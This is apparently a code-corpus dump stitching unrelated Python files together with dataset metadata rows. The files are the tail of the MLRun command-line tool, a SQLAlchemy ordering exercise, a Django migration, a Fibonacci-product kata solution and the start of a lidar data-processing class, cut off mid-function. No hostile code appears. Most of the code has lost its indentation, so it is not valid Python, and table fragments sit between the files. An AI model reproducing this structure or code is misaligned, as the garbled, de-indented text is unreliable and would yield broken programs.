@click.option("--verbose", is_flag=True, help="verbose log")
@click.option(
"--scrape-metrics",
is_flag=True,
help="whether to add the `mlrun/scrape-metrics` label to this run's resources",
)
@click.argument("run_args", nargs=-1, type=click.UNPROCESSED)
def run(
url,
param,
inputs,
outputs,
in_path,
out_path,
secrets,
uid,
name,
workflow,
project,
db,
runtime,
kfp,
hyperparam,
param_file,
selector,
hyper_param_strategy,
hyper_param_options,
func_url,
task,
handler,
mode,
schedule,
from_env,
dump,
image,
kind,
source,
local,
auto_mount,
workdir,
label,
watch,
verbose,
scrape_metrics,
run_args,
):
"""Execute a task and inject parameters."""
out_path = out_path or environ.get("MLRUN_ARTIFACT_PATH")
config = environ.get("MLRUN_EXEC_CONFIG")
if from_env and config:
config = json.loads(config)
runobj = RunTemplate.from_dict(config)
elif task:
obj = get_object(task)
task = yaml.load(obj, Loader=yaml.FullLoader)
runobj = RunTemplate.from_dict(task)
else:
runobj = RunTemplate()
set_item(runobj.metadata, uid, "uid")
set_item(runobj.metadata, name, "name")
set_item(runobj.metadata, project, "project")
if label:
label_dict = list2dict(label)
for k, v in label_dict.items():
runobj.metadata.labels[k] = v
if workflow:
runobj.metadata.labels["workflow"] = workflow
if db:
mlconf.dbpath = db
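    # Resolve the runtime spec: from a function url/db reference or an inline kind/image;
    # local .py code is base64-packed into the spec when targeting a non-local runtime.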
if func_url or kind or image:
if func_url:
runtime = func_url_to_runtime(func_url)
kind = get_in(runtime, "kind", kind or "job")
if runtime is None:
exit(1)
else:
kind = kind or "job"
runtime = {"kind": kind, "spec": {"image": image}}
if kind not in ["", "local", "dask"] and url:
if path.isfile(url) and url.endswith(".py"):
with open(url) as fp:
body = fp.read()
based = b64encode(body.encode("utf-8")).decode("utf-8")
logger.info(f"packing code at {url}")
update_in(runtime, "spec.build.functionSourceCode", based)
url = ""
update_in(runtime, "spec.command", "")
elif runtime:
runtime = py_eval(runtime)
if not isinstance(runtime, dict):
print(f"runtime parameter must be a dict, not {type(runtime)}")
exit(1)
else:
runtime = {}
code = environ.get("MLRUN_EXEC_CODE")
if get_in(runtime, "kind", "") == "dask":
code = get_in(runtime, "spec.build.functionSourceCode", code)
if from_env and code:
code = b64decode(code).decode("utf-8")
if kfp:
print(f"code:\n{code}\n")
with open("main.py", "w") as fp:
fp.write(code)
url = url or "main.py"
if url:
if not name and not runtime:
name = path.splitext(path.basename(url))[0]
runobj.metadata.name = runobj.metadata.name or name
update_in(runtime, "spec.command", url)
if run_args:
update_in(runtime, "spec.args", list(run_args))
if image:
update_in(runtime, "spec.image", image)
set_item(runobj.spec, handler, "handler")
set_item(runobj.spec, param, "parameters", fill_params(param))
set_item(runobj.spec, hyperparam, "hyperparams", fill_params(hyperparam))
if hyper_param_options:
runobj.spec.hyper_param_options = py_eval(hyper_param_options)
set_item(runobj.spec.hyper_param_options, param_file, "param_file")
set_item(runobj.spec.hyper_param_options, hyper_param_strategy, "strategy")
set_item(runobj.spec.hyper_param_options, selector, "selector")
set_item(runobj.spec, inputs, run_keys.inputs, list2dict(inputs))
set_item(runobj.spec, in_path, run_keys.input_path)
set_item(runobj.spec, out_path, run_keys.output_path)
set_item(runobj.spec, outputs, run_keys.outputs, list(outputs))
set_item(
runobj.spec, secrets, run_keys.secrets, line2keylist(secrets, "kind", "source")
)
set_item(runobj.spec, verbose, "verbose")
set_item(runobj.spec, scrape_metrics, "scrape_metrics")
update_in(runtime, "metadata.name", name, replace=False)
update_in(runtime, "metadata.project", project, replace=False)
if kfp or runobj.spec.verbose or verbose:
print(f"MLRun version: {str(Version().get())}")
print("Runtime:")
pprint(runtime)
print("Run:")
pprint(runobj.to_dict())
try:
fn = new_function(runtime=runtime, kfp=kfp, mode=mode)
if workdir:
fn.spec.workdir = workdir
if auto_mount:
fn.apply(auto_mount_modifier())
if source:
supported_runtimes = [
"",
"local",
RuntimeKinds.job,
RuntimeKinds.remotespark,
]
if fn.kind not in supported_runtimes:
print(
f"source flag only works with the {','.join(supported_runtimes)} runtimes"
)
exit(1)
fn.spec.build.source = source
fn.spec.build.load_source_on_run = True
fn.is_child = from_env and not kfp
resp = fn.run(runobj, watch=watch, schedule=schedule, local=local)
if resp and dump:
print(resp.to_yaml())
except RunError as err:
print(f"runtime error: {err}")
exit(1)
@main.command(context_settings=dict(ignore_unknown_options=True))
@click.argument("func_url", type=str, required=False)
@click.option("--name", help="function name")
@click.option("--project", help="project name")
@click.option("--tag", default="", help="function tag")
@click.option("--image", "-i", help="target image path")
@click.option(
"--source", "-s", default="", help="location/url of the source files dir/tar"
)
@click.option("--base-image", "-b", help="base docker image")
@click.option(
"--command",
"-c",
default="",
multiple=True,
help="build commands, e.g. '-c pip install pandas'",
)
@click.option("--secret-name", default="", help="container registry secret name")
@click.option("--archive", "-a", default="", help="destination archive for code (tar)")
@click.option("--silent", is_flag=True, help="do not show build logs")
@click.option("--with-mlrun", is_flag=True, help="add MLRun package")
@click.option("--db", default="", help="save run results to path or DB url")
@click.option(
"--runtime", "-r", default="", help="function spec dict, for pipeline usage"
)
@click.option(
"--kfp", is_flag=True, help="running inside Kubeflow Piplines, do not use"
)
@click.option("--skip", is_flag=True, help="skip if already deployed")
def build(
func_url,
name,
project,
tag,
image,
source,
base_image,
command,
secret_name,
archive,
silent,
with_mlrun,
db,
runtime,
kfp,
skip,
):
"""Build a container image from code and requirements."""
if db:
mlconf.dbpath = db
if runtime:
runtime = py_eval(runtime)
if not isinstance(runtime, dict):
print(f"runtime parameter must be a dict, not {type(runtime)}")
exit(1)
if kfp:
print("Runtime:")
pprint(runtime)
func = new_function(runtime=runtime)
elif func_url.startswith("db://"):
func_url = func_url[5:]
func = import_function(func_url)
elif func_url:
func_url = "function.yaml" if func_url == "." else func_url
func = import_function(func_url)
else:
print("please specify the function path or url")
exit(1)
meta = func.metadata
meta.project = project or meta.project or mlconf.default_project
meta.name = name or meta.name
meta.tag = tag or meta.tag
b = func.spec.build
if func.kind not in ["", "local"]:
b.base_image = base_image or b.base_image
b.commands = list(command) or b.commands
b.image = image or b.image
b.secret = secret_name or b.secret
if source.endswith(".py"):
if not path.isfile(source):
print(f"source file doesnt exist ({source})")
exit(1)
with open(source) as fp:
body = fp.read()
based = b64encode(body.encode("utf-8")).decode("utf-8")
logger.info(f"packing code at {source}")
b.functionSourceCode = based
func.spec.command = ""
else:
b.source = source or b.source
# todo: upload stuff
archive = archive or mlconf.default_archive
if archive:
src = b.source or "./"
logger.info(f"uploading data from {src} to {archive}")
target = archive if archive.endswith("/") else archive + "/"
target += f"src-{meta.project}-{meta.name}-{meta.tag or 'latest'}.tar.gz"
upload_tarball(src, target)
# todo: replace function.yaml inside the tar
b.source = target
if hasattr(func, "deploy"):
logger.info("remote deployment started")
try:
func.deploy(
with_mlrun=with_mlrun, watch=not silent, is_kfp=kfp, skip_deployed=skip
)
except Exception as err:
print(f"deploy error, {err}")
exit(1)
state = func.status.state
image = func.spec.image
if kfp:
with open("/tmp/state", "w") as fp:
fp.write(state or "none")
full_image = func.full_image_path(image) or ""
with open("/tmp/image", "w") as fp:
fp.write(image)
with open("/tmp/fullimage", "w") as fp:
fp.write(full_image)
print("full image path = ", full_image)
print(f"function built, state={state} image={image}")
else:
print("function does not have a deploy() method")
exit(1)
@main.command(context_settings=dict(ignore_unknown_options=True))
@click.argument("spec", type=str, required=False)
@click.option("--source", "-s", default="", help="location/url of the source")
@click.option(
"--func-url",
"-f",
default="",
help="path/url of function yaml or function " "yaml or db://<project>/<name>[:tag]",
)
@click.option("--dashboard", "-d", default="", help="nuclio dashboard url")
@click.option("--project", "-p", default="", help="project name")
@click.option("--model", "-m", multiple=True, help="model name and path (name=path)")
@click.option("--kind", "-k", default=None, help="runtime sub kind")
@click.option("--tag", default="", help="version tag")
@click.option("--env", "-e", multiple=True, help="environment variables")
@click.option("--verbose", is_flag=True, help="verbose log")
def deploy(spec, source, func_url, dashboard, project, model, tag, kind, env, verbose):
"""Deploy model or function"""
if func_url:
runtime = func_url_to_runtime(func_url)
if runtime is None:
exit(1)
elif spec:
runtime = py_eval(spec)
else:
runtime = {}
if not isinstance(runtime, dict):
print(f"runtime parameter must be a dict, not {type(runtime)}")
exit(1)
if verbose:
pprint(runtime)
pprint(model)
# support both v1 & v2+ model struct for backwards compatibility
if runtime and runtime["kind"] == RuntimeKinds.serving:
print("Deploying V2 model server")
function = ServingRuntime.from_dict(runtime)
if model:
# v2+ model struct (list of json obj)
for _model in model:
args = json.loads(_model)
function.add_model(**args)
else:
function = RemoteRuntime.from_dict(runtime)
if kind:
function.spec.function_kind = kind
if model:
# v1 model struct (list of k=v)
models = list2dict(model)
for k, v in models.items():
function.add_model(k, v)
function.spec.source = source
if env:
for k, v in list2dict(env).items():
function.set_env(k, v)
function.verbose = verbose
try:
addr = function.deploy(dashboard=dashboard, project=project, tag=tag)
except Exception as err:
print(f"deploy error: {err}")
exit(1)
print(f"function deployed, address={addr}")
with open("/tmp/output", "w") as fp:
fp.write(addr)
with open("/tmp/name", "w") as fp:
fp.write(function.status.nuclio_name)
@main.command(context_settings=dict(ignore_unknown_options=True))
@click.argument("pod", type=str)
@click.option("--namespace", "-n", help="kubernetes namespace")
@click.option(
"--timeout", "-t", default=600, show_default=True, help="timeout in seconds"
)
def watch(pod, namespace, timeout):
"""Read current or previous task (pod) logs."""
k8s = K8sHelper(namespace)
status = k8s.watch(pod, namespace, timeout)
print(f"Pod {pod} last status is: {status}")
@main.command(context_settings=dict(ignore_unknown_options=True))
@click.argument("kind", type=str)
@click.argument("name", type=str, default="", required=False)
@click.option("--selector", "-s", default="", help="label selector")
@click.option("--namespace", "-n", help="kubernetes namespace")
@click.option("--uid", help="unique ID")
@click.option("--project", "-p", help="project name")
@click.option("--tag", "-t", default="", help="artifact/function tag")
@click.option("--db", help="db path/url")
@click.argument("extra_args", nargs=-1, type=click.UNPROCESSED)
def get(kind, name, selector, namespace, uid, project, tag, db, extra_args):
"""List/get one or more object per kind/class."""
if db:
mlconf.dbpath = db
if kind.startswith("po"):
k8s = K8sHelper(namespace)
if name:
resp = k8s.get_pod(name, namespace)
print(resp)
return
items = k8s.list_pods(namespace, selector)
print(f"{'state':10} {'started':16} {'type':8} name")
for i in items:
task = i.metadata.labels.get("mlrun/class", "")
if task:
name = i.metadata.name
state = i.status.phase
start = ""
if i.status.start_time:
start = i.status.start_time.strftime("%b %d %H:%M:%S")
print(f"{state:10} {start:16} {task:8} {name}")
elif kind.startswith("runtime"):
run_db = get_run_db(db or mlconf.dbpath)
if name:
# the runtime identifier is its kind
runtime = run_db.get_runtime(kind=name, label_selector=selector)
print(dict_to_yaml(runtime))
return
runtimes = run_db.list_runtimes(label_selector=selector)
print(dict_to_yaml(runtimes))
elif kind.startswith("run"):
run_db = get_run_db()
if name:
run = run_db.read_run(name, project=project)
print(dict_to_yaml(run))
return
runs = run_db.list_runs(uid=uid, project=project, labels=selector)
df = runs.to_df()[
["name", "uid", "iter", "start", "state", "parameters", "results"]
]
# df['uid'] = df['uid'].apply(lambda x: f'..{x[-6:]}')
df["start"] = df["start"].apply(time_str)
df["parameters"] = df["parameters"].apply(dict_to_str)
df["results"] = df["results"].apply(dict_to_str)
print(tabulate(df, headers="keys"))
elif kind.startswith("art"):
run_db = get_run_db()
artifacts = run_db.list_artifacts(
name, project=project, tag=tag, labels=selector
)
df = artifacts.to_df()[
["tree", "key", "iter", "kind", "path", "hash", "updated"]
]
df["tree"] = df["tree"].apply(lambda x: f"..{x[-8:]}")
df["hash"] = df["hash"].apply(lambda x: f"..{x[-6:]}")
print(tabulate(df, headers="keys"))
elif kind.startswith("func"):
run_db = get_run_db()
if name:
f = run_db.get_function(name, project=project, tag=tag)
print(dict_to_yaml(f))
return
functions = run_db.list_functions(name, project=project, labels=selector)
lines = []
headers = ["kind", "state", "name:tag", "hash"]
for f in functions:
name = get_in(f, "metadata.name")
tag = get_in(f, "metadata.tag", "")
line = [
get_in(f, "kind", ""),
get_in(f, "status.state", ""),
f"{name}:{tag}",
get_in(f, "metadata.hash", ""),
]
lines.append(line)
print(tabulate(lines, headers=headers))
else:
print(
"currently only get pods | runs | artifacts | func [name] | runtime are supported"
)
@main.command()
@click.option("--port", "-p", help="port to listen on", type=int)
@click.option("--dirpath", "-d", help="database directory (dirpath)")
def db(port, dirpath):
"""Run HTTP api/database server"""
env = environ.copy()
if port is not None:
env["MLRUN_httpdb__port"] = str(port)
if dirpath is not None:
env["MLRUN_httpdb__dirpath"] = dirpath
cmd = [executable, "-m", "mlrun.api.main"]
child = Popen(cmd, env=env)
returncode = child.wait()
if returncode != 0:
raise SystemExit(returncode)
@main.command()
def version():
"""get mlrun version"""
print(f"MLRun version: {str(Version().get())}")
@main.command()
@click.argument("uid", type=str)
@click.option("--project", "-p", help="project name")
@click.option("--offset", type=int, default=0, help="byte offset")
@click.option("--db", help="api and db service path/url")
@click.option("--watch", "-w", is_flag=True, help="watch/follow log")
def logs(uid, project, offset, db, watch):
"""Get or watch task logs"""
mldb = get_run_db(db or mlconf.dbpath)
if mldb.kind == "http":
state = mldb.watch_log(uid, project, watch=watch, offset=offset)
else:
state, text = mldb.get_log(uid, project, offset=offset)
if text:
print(text.decode())
if state:
print(f"final state: {state}")
@main.command()
@click.argument("context", default="", type=str, required=False)
@click.option("--name", "-n", help="project name")
@click.option("--url", "-u", help="remote git or archive url")
@click.option("--run", "-r", help="run workflow name of .py file")
@click.option(
"--arguments",
"-a",
default="",
multiple=True,
help="Kubeflow pipeline arguments name and value tuples, e.g. -a x=6",
)
@click.option("--artifact-path", "-p", help="output artifacts path")
@click.option(
"--param",
"-x",
default="",
multiple=True,
help="mlrun project parameter name and value tuples, e.g. -p x=37 -p y='text'",
)
@click.option(
"--secrets", "-s", multiple=True, help="secrets file=<filename> or env=ENV_KEY1,.."
)
@click.option("--namespace", help="k8s namespace")
@click.option("--db", help="api and db service path/url")
@click.option("--init-git", is_flag=True, help="for new projects init git context")
@click.option(
"--clone", "-c", is_flag=True, help="force override/clone the context dir"
)
@click.option("--sync", is_flag=True, help="sync functions into db")
@click.option(
"--watch", "-w", is_flag=True, help="wait for pipeline completion (with -r flag)"
)
@click.option("--dirty", "-d", is_flag=True, help="allow git with uncommited changes")
@click.option("--git-repo", help="git repo (org/repo) for git comments")
@click.option(
"--git-issue", type=int, default=None, help="git issue number for git comments"
)
def project(
context,
name,
url,
run,
arguments,
artifact_path,
param,
secrets,
namespace,
db,
init_git,
clone,
sync,
watch,
dirty,
git_repo,
git_issue,
):
"""load and/or run a project"""
if db:
mlconf.dbpath = db
proj = load_project(context, url, name, init_git=init_git, clone=clone)
url_str = " from " + url if url else ""
print(f"Loading project {proj.name}{url_str} into {context}:\n")
if artifact_path and not ("://" in artifact_path or artifact_path.startswith("/")):
artifact_path = path.abspath(artifact_path)
if param:
proj.params = fill_params(param, proj.params)
if git_repo:
proj.params["git_repo"] = git_repo
if git_issue:
proj.params["git_issue"] = git_issue
commit = (
proj.params.get("commit")
or environ.get("GITHUB_SHA")
or environ.get("CI_COMMIT_SHA")
)
if commit:
proj.params["commit"] = commit
if secrets:
secrets = line2keylist(secrets, "kind", "source")
proj._secrets = SecretsStore.from_list(secrets)
print(proj.to_yaml())
if run:
workflow_path = None
if run.endswith(".py"):
workflow_path = run
run = None
args = None
if arguments:
args = fill_params(arguments)
print(f"running workflow {run} file: {workflow_path}")
message = run = ""
had_error = False
try:
run = proj.run(
run,
workflow_path,
arguments=args,
artifact_path=artifact_path,
namespace=namespace,
sync=sync,
dirty=dirty,
)
except Exception as exc:
print(traceback.format_exc())
message = f"failed to run pipeline, {exc}"
had_error = True
print(message)
print(f"run id: {run}")
gitops = (
git_issue
or environ.get("GITHUB_EVENT_PATH")
or environ.get("CI_MERGE_REQUEST_IID")
)
n = RunNotifications(with_slack=True, secrets=proj._secrets).print()
if gitops:
n.git_comment(git_repo, git_issue, token=proj.get_secret("GITHUB_TOKEN"))
if not had_error:
n.push_start_message(proj.name, commit, run)
else:
n.push(message)
if had_error:
exit(1)
if watch:
proj.get_run_status(run, notifiers=n)
elif sync:
print("saving project functions to db ..")
proj.sync_functions(save=True)
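# Hedged usage sketches for the `project` command (flags as defined above; paths and URLs
# are placeholders):
#   mlrun project ./myproj -u <git-or-archive-url>     # load a project into ./myproj
#   mlrun project ./myproj -r workflow.py -w           # run a workflow file and wait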
def validate_kind(ctx, param, value):
possible_kinds = RuntimeKinds.runtime_with_handlers()
if value is not None and value not in possible_kinds:
raise click.BadParameter(
f"kind must be one of {possible_kinds}", ctx=ctx, param=param
)
return value
@main.command()
@click.argument("kind", callback=validate_kind, default=None, required=False)
@click.argument("object_id", metavar="id", type=str, default=None, required=False)
@click.option("--api", help="api service url")
@click.option("--label-selector", "-ls", default="", help="label selector")
@click.option(
"--force", "-f", is_flag=True, help="clean resources in non-terminal states as well"
)
@click.option(
"--grace-period",
"-gp",
type=int,
# When someone triggers the cleanup manually we assume they want runtime resources in terminal state to be removed
# now, therefore not using here mlconf.runtime_resources_deletion_grace_period
default=0,
help="the grace period (in seconds) that will be given to runtime resources (after they're in terminal state) "
"before cleaning them. Ignored when --force is given",
show_default=True,
)
def clean(kind, object_id, api, label_selector, force, grace_period):
"""
Clean jobs resources
\b
Examples:
\b
# Clean resources for all runs of all runtimes
mlrun clean
\b
# Clean resources for all runs of a specific kind (e.g. job)
mlrun clean job
\b
# Clean resources for specific job (by uid)
mlrun clean mpijob 15d04c19c2194c0a8efb26ea3017254b
"""
mldb = get_run_db(api or mlconf.dbpath)
if kind:
if object_id:
mldb.delete_runtime_object(
kind=kind,
object_id=object_id,
label_selector=label_selector,
force=force,
grace_period=grace_period,
)
else:
mldb.delete_runtime(
kind=kind,
label_selector=label_selector,
force=force,
grace_period=grace_period,
)
else:
mldb.delete_runtimes(
label_selector=label_selector, force=force, grace_period=grace_period
)
@main.command(name="watch-stream")
@click.argument("url", type=str)
@click.option(
"--shard-ids",
"-s",
multiple=True,
type=int,
help="shard id to listen on (can be multiple)",
)
@click.option("--seek", help="where to start/seek (EARLIEST or LATEST)")
@click.option(
"--interval",
"-i",
default=3,
show_default=True,
help="interval in seconds",
type=int,
)
@click.option(
"--is-json",
"-j",
is_flag=True,
help="indicate the payload is json (will be deserialized)",
)
def watch_stream(url, shard_ids, seek, interval, is_json):
"""watch on a stream and print data every interval"""
mlrun.platforms.watch_stream(
url, shard_ids, seek, interval=interval, is_json=is_json
)
@main.command(name="config")
def show_config():
"""Show configuration & exit"""
print(mlconf.dump_yaml())
def fill_params(params, params_dict=None):
params_dict = params_dict or {}
for param in params:
i = param.find("=")
if i == -1:
continue
key, value = param[:i].strip(), param[i + 1 :].strip()
if key is None:
raise ValueError(f"cannot find param key in line ({param})")
params_dict[key] = py_eval(value)
return params_dict
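# Hedged illustration (not part of the original module): fill_params(["x=37", "y='text'"])
# returns {"x": 37, "y": "text"}, since each value is passed through py_eval() below,
# which applies literal_eval and falls back to the raw string when parsing fails.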
def py_eval(data):
try:
value = literal_eval(data)
return value
except (SyntaxError, ValueError):
return data
def set_item(obj, item, key, value=None):
if item:
if value:
setattr(obj, key, value)
else:
setattr(obj, key, item)
def line2keylist(lines: list, keyname="key", valname="path"):
out = []
for line in lines:
i = line.find("=")
if i == -1:
raise ValueError(f'cannot find "=" in line ({keyname}={valname})')
key, value = line[:i].strip(), line[i + 1 :].strip()
if key is None:
raise ValueError(f"cannot find key in line ({keyname}={valname})")
value = path.expandvars(value)
out += [{keyname: key, valname: value}]
return out
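# Hedged illustration: line2keylist(["env=MY_KEY"], "kind", "source") yields
# [{"kind": "env", "source": "MY_KEY"}] (after expanding environment variables in the
# value), which is how the --secrets options above are fed into SecretsStore.from_list().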
def time_str(x):
    try:
        return x.strftime("%b %d %H:%M:%S")
    except (AttributeError, ValueError):  # x may be empty or not a datetime
        return ""
def dict_to_str(struct: dict):
    if not struct:
        return ""
    return ",".join([f"{k}={v}" for k, v in struct.items()])
def func_url_to_runtime(func_url):
try:
if func_url.startswith("db://"):
func_url = func_url[5:]
project_instance, name, tag, hash_key = parse_versioned_object_uri(func_url)
run_db = get_run_db(mlconf.dbpath)
runtime = run_db.get_function(name, project_instance, tag, hash_key)
else:
func_url = "function.yaml" if func_url == "." else func_url
runtime = import_function_to_dict(func_url, {})
except Exception as exc:
logger.error(f"function {func_url} not found, {exc}")
return None
if not runtime:
logger.error(f"function {func_url} not found or is null")
return None
return runtime
if __name__ == "__main__":
main()
| 32.247505 | 118 | 0.609464 |
31939d900a952ba60adb1c729242ffa07a270d25 | 678 | py | Python | 6 - introduction to databases in python/ordering by a Single Column.py | Baidaly/datacamp-samples | 09b3e253ec2c503df936298fedc3902413c987b0 | [
"MIT"
] | null | null | null | 6 - introduction to databases in python/ordering by a Single Column.py | Baidaly/datacamp-samples | 09b3e253ec2c503df936298fedc3902413c987b0 | [
"MIT"
] | null | null | null | 6 - introduction to databases in python/ordering by a Single Column.py | Baidaly/datacamp-samples | 09b3e253ec2c503df936298fedc3902413c987b0 | [
"MIT"
] | null | null | null | '''
To sort the result output by a field, we use the .order_by() method. By default, the .order_by() method sorts from lowest to highest on the supplied column. You just have to pass in the name of the column you want sorted to .order_by(). In the video, for example, Jason used stmt.order_by(census.columns.state) to sort the result output by the state column.
'''
# Build a query to select the state column: stmt
stmt = select([census.columns.state])
# Order stmt by the state column
stmt = stmt.order_by(census.columns.state)
# Execute the query and store the results: results
results = connection.execute(stmt).fetchall()
# Print the first 10 results
print(results[:10])
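# A hedged extension of the exercise above (not part of the original snippet): the same
# query can be sorted from highest to lowest by wrapping the column in SQLAlchemy's desc(),
# assuming `census` and `connection` are set up as in the exercise.
# from sqlalchemy import desc
# stmt_desc = select([census.columns.state]).order_by(desc(census.columns.state))
# print(connection.execute(stmt_desc).fetchall()[:10])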
| 45.2 | 357 | 0.755162 |
561c8a42e1dda3730f77dafbdca28887bd966ba4 | 473 | py | Python | guests/migrations/0007_auto_20160207_2119.py | dannymuchoki/django-wedding-website | 4cb322719b04500b587500ea65311f3db302732d | [
"Apache-2.0"
] | null | null | null | guests/migrations/0007_auto_20160207_2119.py | dannymuchoki/django-wedding-website | 4cb322719b04500b587500ea65311f3db302732d | [
"Apache-2.0"
] | null | null | null | guests/migrations/0007_auto_20160207_2119.py | dannymuchoki/django-wedding-website | 4cb322719b04500b587500ea65311f3db302732d | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-02-07 21:19
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('guests', '0006_auto_20160207_2116'),
]
operations = [
migrations.AlterField(
model_name='guest',
name='email',
field=models.TextField(blank=True, null=True),
),
]
| 22.52381 | 59 | 0.587738 |
71ba7241d5f75f45dc72521483f256eada1dc0be | 2,412 | py | Python | codewars/productFib.py | tarcisioallyson/python_exercise | be5257c5cce7c0c2b573ece2308e3b5b03c22fac | [
"Unlicense"
] | null | null | null | codewars/productFib.py | tarcisioallyson/python_exercise | be5257c5cce7c0c2b573ece2308e3b5b03c22fac | [
"Unlicense"
] | null | null | null | codewars/productFib.py | tarcisioallyson/python_exercise | be5257c5cce7c0c2b573ece2308e3b5b03c22fac | [
"Unlicense"
] | null | null | null | """ The Fibonacci numbers are the numbers in the following integer sequence (Fn):
0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, ...
such that
F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
Given a number, say prod (for product), we search two Fibonacci numbers F(n) and F(n+1) verifying
F(n) * F(n+1) = prod.
Your function productFib takes an integer (prod) and returns an array:
[F(n), F(n+1), true] or {F(n), F(n+1), 1} or (F(n), F(n+1), True)
depending on the language if F(n) * F(n+1) = prod.
If you don't find two consecutive F(m) verifying F(m) * F(m+1) = prod you will return
[F(m), F(m+1), false] or {F(n), F(n+1), 0} or (F(n), F(n+1), False)
F(m) being the smallest one such that F(m) * F(m+1) > prod.
Some Examples of Return:
(depending on the language)
productFib(714) # should return (21, 34, true),
# since F(8) = 21, F(9) = 34 and 714 = 21 * 34
productFib(800) # should return (34, 55, false),
# since F(8) = 21, F(9) = 34, F(10) = 55 and 21 * 34 < 800 < 34 * 55
-----
productFib(714) # should return [21, 34, true],
productFib(800) # should return [34, 55, false],
-----
productFib(714) # should return {21, 34, 1},
productFib(800) # should return {34, 55, 0},
-----
productFib(714) # should return {21, 34, true},
productFib(800) # should return {34, 55, false}, """
def productFib(prod):
fibo_num = []
prod_fib = []
ctrl = 0
if prod < 5:
ctrl = 5
else:
ctrl = prod
i = 0
while i < ctrl:
#calculate fib numbers
if len(fibo_num) == 0:
fibo_num.append(i)
elif len(fibo_num) == 1:
fibo_num.append(i)
elif len(fibo_num) > 1:
fibo_num.append(fibo_num[i-1] + fibo_num[i-2])
#verify condition of product
if len(fibo_num) > 1:
if fibo_num[i-1] * fibo_num[i] == prod:
prod_fib.append(fibo_num[i-1])
prod_fib.append(fibo_num[i])
prod_fib.append(True)
break
elif fibo_num[i-2] * fibo_num[i-1] < prod < fibo_num[i-1] * fibo_num[i]:
prod_fib.append(fibo_num[i-1])
prod_fib.append(fibo_num[i])
prod_fib.append(False)
break
i+=1
return prod_fib
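# A more direct sketch of the same search (an illustrative alternative, not the original
# kata submission): walk consecutive Fibonacci pairs until their product reaches prod.
def product_fib_simple(prod):
    a, b = 0, 1
    while a * b < prod:
        a, b = b, a + b
    return [a, b, a * b == prod]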
print(productFib(2)) | 31.324675 | 98 | 0.53068 |
15fa47396cd95eda37541b6461bda9e4e264e546 | 2,024 | py | Python | accounts/migrations/0001_initial.py | hpanwar08/greatkart | 834ff9fabdbb9493f54bcfd5d23505831b4a66d2 | [
"MIT"
] | null | null | null | accounts/migrations/0001_initial.py | hpanwar08/greatkart | 834ff9fabdbb9493f54bcfd5d23505831b4a66d2 | [
"MIT"
] | null | null | null | accounts/migrations/0001_initial.py | hpanwar08/greatkart | 834ff9fabdbb9493f54bcfd5d23505831b4a66d2 | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-12-22 06:26
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='Account',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('first_name', models.CharField(blank=True, max_length=50)),
('last_name', models.CharField(blank=True, max_length=50)),
('username', models.CharField(max_length=50, unique=True)),
('email', models.EmailField(max_length=100, unique=True)),
('phone_number', models.CharField(max_length=50)),
('last_login', models.DateTimeField(default=django.utils.timezone.now, editable=False)),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, editable=False)),
('is_admin', models.BooleanField(default=False)),
('is_staff', models.BooleanField(default=False)),
('is_active', models.BooleanField(default=True)),
('is_superuser', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| 50.6 | 266 | 0.629447 |
98775b2b7bba19b7fb3191f4407f514b4ea33aa6 | 5,003 | py | Python | lidardet/datasets/processor/data_processor.py | Jiaolong/trajectory-prediction | 3fd4e6253b44dfdc86e7c08e93c002baf66f2e46 | [
"Apache-2.0"
] | 6 | 2021-05-10T09:42:01.000Z | 2022-01-04T08:03:42.000Z | lidardet/datasets/processor/data_processor.py | Jiaolong/trajectory-prediction | 3fd4e6253b44dfdc86e7c08e93c002baf66f2e46 | [
"Apache-2.0"
] | 3 | 2021-08-16T02:19:10.000Z | 2022-01-10T02:05:48.000Z | lidardet/datasets/processor/data_processor.py | Jiaolong/trajectory-prediction | 3fd4e6253b44dfdc86e7c08e93c002baf66f2e46 | [
"Apache-2.0"
] | 1 | 2021-07-15T00:51:58.000Z | 2021-07-15T00:51:58.000Z | from functools import partial
import numpy as np
# Several processors below reference geometry, box_utils and the scan_* helpers,
# so these imports must be active for those branches to run.
from ...utils import box_utils, geometry
from ...utils.common import scan_downsample, scan_upsample, scan_to_range
class DataProcessor(object):
def __init__(self, processor_configs):
self.grid_size = self.voxel_size = None
self.data_processor_queue = []
for cur_cfg in processor_configs:
cur_processor = getattr(self, cur_cfg['name'])(config=cur_cfg)
self.data_processor_queue.append(cur_processor)
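    # Hedged example of the processor_configs list this constructor expects (each 'name'
    # must match one of the methods below; the values are placeholders):
    #   [{'name': 'shuffle_points'},
    #    {'name': 'remove_points_and_boxes_outside_range',
    #     'point_cloud_range': [0, -40, -3, 70.4, 40, 1], 'remove_outside_boxes': True}]
    # Each method, when called with data_dict=None, returns a partial bound to its config;
    # those partials are what get queued here and later invoked by forward().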
def remove_points_and_boxes_outside_range(self, data_dict=None, config=None):
if data_dict is None:
return partial(self.remove_points_and_boxes_outside_range, config=config)
point_cloud_range = np.array(config['point_cloud_range'], dtype=np.float32)
mask = geometry.mask_points_by_range(data_dict['points'], point_cloud_range)
data_dict['points'] = data_dict['points'][mask]
if data_dict.get('gt_boxes', None) is not None and config['remove_outside_boxes']:
mask = box_utils.mask_boxes_outside_range_numpy(
data_dict['gt_boxes'], point_cloud_range, min_num_corners=config.get('min_num_corners', 1)
)
data_dict['gt_boxes'] = data_dict['gt_boxes'][mask]
return data_dict
def normalization(self, data_dict=None, config=None):
if data_dict is None:
return partial(self.normalization, config=config)
img = data_dict['range_image_in']
for i in range(img.shape[0]):
img[i,...] = (img[i,...] - config['mean'][i]) / config['std'][i]
